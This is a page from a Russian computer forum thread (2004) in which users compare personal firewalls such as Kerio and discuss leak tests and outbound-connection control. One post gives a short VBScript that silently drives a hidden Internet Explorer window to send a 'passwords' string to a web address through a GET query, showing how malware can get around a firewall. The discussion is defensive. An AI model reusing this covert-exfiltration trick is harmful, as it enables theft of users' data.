Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Компьютеры » Программы » Лучший файрволл firewall

Модерирует : gyra, Maz

Widok (13-03-2005 20:39): лимит страниц.
продолжаем здесь
 Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99

   

Nep



Moderator
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
~~~ Обсуждаем и сравниваем файрволы ~~~

Тесты на пробиваемость файрвола снаружи
PCFlank | Sygate | Symantec | HackerWatch.org | Infotecs.ru | DSL reports | ShieldsUP!
 
Тесты на пробиваемость файрвола изнутри
Firewal Leak Tester: сводная таблица результатов, сами тесты: LeakTest | TooLeaky | FireHole | Yalta | Outbound | PCAudit | AWFT | Thermite | CopyCat | MBtest | WallBreaker | PCaudit v2 | Ghost | DNStester  
 
Обсуждения конкретных файрволов
 
Файрвол, официальный сайт    Тема в программах    Тема в варезнике      
InJoy    -    линк      
Jetico    линк    -      
Kaspersky Anti-Hacker    линк    линк      
Kerio    линк    линк      
Look 'n' Stop    линк    линк      
McAfee Desktop    линк    линк      
McAfee Personal Plus    линк    -      
Outpost    линк    линк      
Sygate    линк    линк      
Tiny    линк    линк      
VisNetic    линк    линк      
ZoneAlarm    линк    линк      
pcInternet Patrol - онлайновый сервис    линк    линк      
Blink® Intrusion Prevention System     линк     линк      

 
Другие полезные ссылки
Кто лучше? (ТОЛЬКО голосование)
Настройка персональных файерволов (firewall rules)

Всего записей: 41940 | Зарегистр. 24-06-2001 | Отправлено: 06:35 02-07-2001 | Исправлено: estimated, 14:24 05-01-2005
speakerr



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Karlsberg

Цитата:
Чисто для информации.... Керио 2.1.5 пропускает один из лик-тестов (см. шапку). Баги они, конечно, исправляют, а новые способы обхода файерволов - нет.

ага. это уже, наверное, серьезнее аргумент... спасибо. придется таки выкроить время для почитать...  
 
я ведь заглянул в этот топик как раз для того, чтобы "уговорить" себя найти что-нибудь поновее... понимая, что ОНО не стоит на месте, в отличие от kerio 2.1.5...

Всего записей: 423 | Зарегистр. 09-02-2004 | Отправлено: 23:09 17-02-2004
estimated



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Karlsberg

Цитата:
Керио 2.1.5 пропускает один из лик-тестов (см. шапку)

какой именно?

Всего записей: 1088 | Зарегистр. 15-02-2002 | Отправлено: 01:23 18-02-2004
Karlsberg



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
estimated
AWFT, тест 1-й (или 2-й, точно не помню, там где он внутри себя открывает страничку со своего хомяка). Файер настроен правильно.

Всего записей: 1008 | Зарегистр. 13-12-2001 | Отправлено: 02:40 18-02-2004
spike



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
albel нет не помогает
 
 

Всего записей: 693 | Зарегистр. 23-10-2003 | Отправлено: 09:50 18-02-2004
estimated



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Karlsberg: я проверил. На мой взгляд, это не совсем корректно утверждать, что в данном случае пробивается файрвол. Ведь этот тест (AWFT) не сам лезет в инет, а лишь пытается использовать для этого другие проги, расчитывая на то, что этим другим разрешены исходящие соединения.
 
А именно, речь идет о следующих прогах:
 
1) что зарегистрировано на открытие HTML-файлов по-умолчанию (AWFT help говорит "броузере по-умолчанию", но на самом деле в реестре проверяется эта ветка: HKEY_CLASSES_ROOT\htmlfile\shell, это вроде не одно и тоже, но может я и ошибаюсь, а кроме того детально не проверял, куда AWFT еще заглядывает)
 
2) Windows Explorer (explorer.exe) / Internet Eplorer (iexplore.exe)
 
3) локальные прокси
 
Если вышеуказанным программам не разрешены исходящие соединения, то и AWFT обламывается, Kerio 2.1.5 ловит эти попытки без проблем, - т.е. никакого пробивания не происходит.
 
Получается, здесь проблема не в файрволе, а в контроле запуска приложений(процессов), т.е. задача для Sandbox'а.  
 
С Kerio 2.1.5 есть такой вариант: использовать sandbox SSM - System Safety Monitor (maxcomputing.narod.ru) - отличная разработка "нашего" человека, который многие годы занимался этой проблемой. Я например даже не уверен, что, sandbox'ы, встроенные в коммерческие продукты (напр. Tiny 5), работают надежнее.
 
Если без Sandbox'а, то напрашиваются такие выводы:
1. Запретить коннекты для Windows Explorer (explore.exe) и Internet Eplorer (iexplore.exe)
2. Не регистрировать используемый броузер (напр. MYIE) на открытие HTML-файлов по умолчанию / как "броузер по-умолчанию".
3. По возможности, не использовать локальные прокси.
 
 
Если где-то не прав, поравьте. У меня самого пока еще не сложилось окончательного мнения по поводу политики контроля исходящих соединений, буду рад, если еще кто-то поделится опытом/мнениями/соображениями.

Всего записей: 1088 | Зарегистр. 15-02-2002 | Отправлено: 14:43 18-02-2004
Karlsberg



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
estimated
В общем, прав... Я закрыл дефолтный браузер и хожу в интернет под другим. Но дело в другом - есть файерволы которые блокируют выход наружу в описанном случае, и не очень хочется добавлять программу на каждую потенциальную дырку. Кроме того, завтра напишут код который будет патчить несколько видов браузеров, или ослика, и т.д.

Всего записей: 1008 | Зарегистр. 13-12-2001 | Отправлено: 15:30 18-02-2004
estimated



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Karlsberg

Цитата:
файерволы которые блокируют выход наружу в описанном случае, и не очень хочется добавлять программу на каждую потенциальную дырку.

ну они наверное как раз и используют для этого свою функциональность sandbox'а (реализованную в большей или меньшей степени). Получается, вопрос только в том, какой sandbox использовать, встроенный в файрвол или отдельный.
 
Еще раз повторю, чтобы ни у кого не сложилось ложного представления: Kerio 2.1.5 и без sandbox'а может запросто блокировать AWFT leaktest! Все зависит только от настроек, т.е. каким программам разрешены коннекты.
 

Цитата:
Кроме того, завтра напишут код который будет патчить несколько видов браузеров, или ослика, и т.д.

Согласен, поэтому и предложил в общем поговорить о политике контроля исходящих соединений...
 
А сам ты чем пользуешься?

Всего записей: 1088 | Зарегистр. 15-02-2002 | Отправлено: 16:36 18-02-2004
Karlsberg



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
estimated
Kerio 2.1.5 + заблокированный дефолтный браузер + юзер, под которым хожу в интернет, не админ (limited user), с правом писАть только в отведенное для него место (NTFS).
Все никак не соберусь перелезть на Kerio 4...

Всего записей: 1008 | Зарегистр. 13-12-2001 | Отправлено: 17:02 18-02-2004
estimated



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Karlsberg: спасибо. А что, нормальный вариант, и без лишней мороки с настройками :)

Всего записей: 1088 | Зарегистр. 15-02-2002 | Отправлено: 19:27 18-02-2004
Karlsberg



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
estimated
Есть пара дырок в такой конфигурации, но это уже для "ручной работы"...

Всего записей: 1008 | Зарегистр. 13-12-2001 | Отправлено: 19:56 18-02-2004
spike



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
albel  
ну так как его настроить ??
 
ps: встроенный Firewall в XP

Всего записей: 693 | Зарегистр. 23-10-2003 | Отправлено: 09:49 19-02-2004 | Исправлено: spike, 09:57 19-02-2004
speakerr



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
estimated

Цитата:
Kerio 2.1.5 и без sandbox'а может запросто блокировать AWFT leaktest! Все зависит только от настроек, т.е. каким программам разрешены коннекты.  

спасибо за анализ. и, если можно, пару вопросов...  
1. что в реальной работе может вызвать внутреннее пробивание файра? троян?
2. какими неприятностями это грозит? примеры, если можно...
 
ps. у меня дефолтный браузер MyIE2. выход запрещен. используется для просмотра локальных документов. рабочий браузер - Mozilla FireFox. ходит через локальный фильтрующий прокси Proxomitron.  

Всего записей: 423 | Зарегистр. 09-02-2004 | Отправлено: 10:11 19-02-2004 | Исправлено: speakerr, 10:15 19-02-2004
albel



Moderator
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
spike
В Services прописать нужные порты. Кстати, попробуй посмотреть ещё TCP/IP Filtering в свойствах интернет-соединения - может, так что заблокировано?
Про домен, к сожалению, ничего сказать не могу . Может, что ещё сможет помочь.

----------
Я никогда не спорю. Я никогда не противоречу. Я иногда забываю. / © Б.Дизраэли/

Всего записей: 11003 | Зарегистр. 30-08-2002 | Отправлено: 19:45 19-02-2004
estimated



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
speakerr
1. трояны, вирусы, шпионский софт (кража паролей или просто статистическая информация, напр. какой-нибудь медиаплейер, сообщающий статистику прослушиваемой музыки и наличие цифровых лицензий на нее); просто программки, сообщающие разработчику, каким серийным номером они были зарегистрированы, и т.п.
 
2. Зависит от профиля использования компьютера. Если каждый день не запускается десяток новых програм неизвестного происхождения, то особо бояться нечего. Для гарантии можно не пользоваться интернетом :) Конкретные последствия зависят от конкретного используемого софта. Если есть сомнения в чистоте своей системы - пожалуйста, существуют антивирусы. Если сомнения по поводу конкретных программ - имеет смысл почитать обсуждения этих программ на форумах (рекомендую ru-board :)
 
Ну, да в общем эти моменты и так понятны. Только не принимай меня за эксперта :) я обычный юзер, ну может слегка продвинутый :)

Всего записей: 1088 | Зарегистр. 15-02-2002 | Отправлено: 04:34 20-02-2004
speakerr



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
estimated

Цитата:
Ну, да в общем эти моменты и так понятны.

эти моменты то понятны... но... пробить файер "вредная" программа может только с помощью использования другой программы, правило и сигнатура которой прописаны в правилах. так ведь? я правильно понял? остальное упрется в правильно прописанную стенку... в частности, в твоем анализе речь шла лишь о возможности использование дефолтного браузера... так вот... КАК с помощью того же IE, вызванного "партизаном", можно поиметь неприятности? какие? ну, понимаю, что может всплыть окно с загруженной похабщиной... а ЧТО еще? как может что-то "убежать" от меня за границу с помощью IE? вот об этом я спрашивал.... т.е. о конкретной ситуации, описанной тобой, а не о "абстрактных ужастиках"...

Всего записей: 423 | Зарегистр. 09-02-2004 | Отправлено: 08:16 20-02-2004
estimated



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
speakerr:  

Цитата:
пробить файер "вредная" программа может только с помощью использования другой программы, правило и сигнатура которой прописаны в правилах.

 
в общем, да. Тем или иным образом используются права, явно предоставленные пользователем другой программе.
 

Цитата:
КАК с помощью того же IE, вызванного "партизаном", можно поиметь неприятности? какие? ну, понимаю, что может всплыть окно с загруженной похабщиной... а ЧТО еще? как может что-то "убежать" от меня за границу с помощью IE?

 
Запросто. Было бы чему убегать. Т.е. имеется ли информация, утечка которой может причинить ущерб. (Если таковой не имеется, то дальше можешь не читать :) Окно IE при этом не обязательно будет всплывать: оно может быть и скрытым (как и любое другое окно в Windows).
 
Я уже писал об это, но повторюсь (можешь открыть этот топик "для печати" и поискать по "WScript.CreateObject", там более подробно описано).
 
Сделай файл "test.vbs":

Код:
 
set ie=WScript.CreateObject("InternetExplorer.Application", "ie_")  
ie.navigate "http://www.ya.ru/yandsearch?text=твои_пароли"  
ie.visible=true  
WScript.Quit
 

 
Запусти его. На сайт yandex уйдет строка "твои_пароли". Ты это увидишь в открывшемся окне IE. Понятно, что вместо этой строки может уходить реальная инфа, причем по любому адресу.
 
А теперь удали строчку "ie.visible=true" и снова запусти скрипт. Инфа уйдет, но ты этого даже не заметишь, т.к. окно IE останется скрытым.
 
Есть и другие методы (посмотри в шапке leaktest'ы, в каждом из них есть описание или help, правда зачастую не совсем полно описывающие всю "кухню", но позволяющие понять, какой метод используется.)

Всего записей: 1088 | Зарегистр. 15-02-2002 | Отправлено: 11:32 20-02-2004
speakerr



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
estimated

Цитата:
Я уже писал об это, но повторюсь (можешь открыть этот топик "для печати" и поискать по "WScript.CreateObject", там более подробно описано).  

а это не суть важно... вызов можно сделать совершенно по-разному.

Цитата:
"http://www.ya.ru/yandsearch?text="твои_пароли"  

вот это главное. нда... я совсем "забыл" про передачу параметров методом GET. стормозил.
 
спасибо.

Всего записей: 423 | Зарегистр. 09-02-2004 | Отправлено: 12:07 20-02-2004
estimated



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
speakerr

Цитата:
вызов можно сделать совершенно по-разному

Вот именно, и передавать инфу можно тоже по-разному. Можно прямо в командной строке. Работает, наверное, во всех броузерах.
 
Строку "WScript.CreateObject" (в процитированном тобой месте) я привел только для того, чтобы ты мог быстро найти мой давний пост в этой теме! Там же смотри о передаче инфы через командную строку.
 
Добавлено
Поправка: через командную строку - наверное все же не "другой метод", а все та же отправка данных формы методом GET.

Всего записей: 1088 | Зарегистр. 15-02-2002 | Отправлено: 00:17 21-02-2004
speakerr



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
estimated

Цитата:
>>вызов можно сделать совершенно по-разному
Вот именно, и передавать инфу можно тоже по-разному. Можно прямо в командной строке. Работает, наверное, во всех броузерах.  

угу. а если принять как аксиому факт построения приложений Windows на технологии COM, то считаю, что рассуждать про возможность "глобального" отслеживания ситуации "откуда у приложения руки растут", по крайней мере несерьезно... куда, интересно, "анализатор" должен залезть? отслеживать все инициализации COM интерфейсов? на которых живет сама система? это покруче будет не только чем сам файр, а чем сама ОС... imho. учитывая всю порочность самой технологии COM... тянущей за собой уже умершие интерфейсы... новые... не до конца соответствующие самому стандарту... дур. дом. да, и самое главное... а причем здесь файр? где таки должна кончаться граница его "ответсвенности"? думаю, то, что делает тот же kerio 2.1.5 - вполне "оптимально разумно". как с точки зрения "постановки задачи", так и с точки зрения ее реализации... остальное все просто нужно возложить на банально известные средства в виде тех же ативирусных пакетов. что, в общем-то, и делается в реальной жизни...  

Цитата:
Поправка: через командную строку - наверное все же не "другой метод", а все та же отправка данных формы методом GET.

да. он самый.

Всего записей: 423 | Зарегистр. 09-02-2004 | Отправлено: 22:10 21-02-2004 | Исправлено: speakerr, 22:13 21-02-2004
estimated



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
speakerr

Цитата:
отслеживать все инициализации COM интерфейсов?

Да, это круто, но ... возможно! Tiny 5 позволяет это делать (смотри здесь подробнее: Access to OLE and COM interfaces). Другое дело, что таким макаром очень легко заморочиться с настройками, так что получится
Цитата:
дур. дом

 

Цитата:
а причем здесь файр

несколько лет назад можно было бы сказать: ни при чем, тогда под файрволом понимался чисто сетевой фильтр. Но в последние годы почти все файрволы в той или иной степени (чемпион здесь, наверное, Tiny 5) включают в себя функциональность sandbox'а - т.е. контроль за запуском и взаимодействием приложений. При этом эти продукты зачастую продолжают все так же называть "файрвол". Ну и возникают непонятки ...
 

Цитата:
думаю, то, что делает тот же kerio 2.1.5 - вполне "оптимально разумно"

Да, для меня это тоже пока оптимальный и достаточный вариант.
 
Одно время пробовал SSM, понравилось, хочу опять поставить и настроить, но как то не доходят руки.

Всего записей: 1088 | Зарегистр. 15-02-2002 | Отправлено: 22:57 21-02-2004 | Исправлено: estimated, 23:02 21-02-2004
   

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99

Компьютерный форум Ru.Board » Компьютеры » Программы » Лучший файрволл firewall
Widok (13-03-2005 20:39): лимит страниц.
продолжаем здесь


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru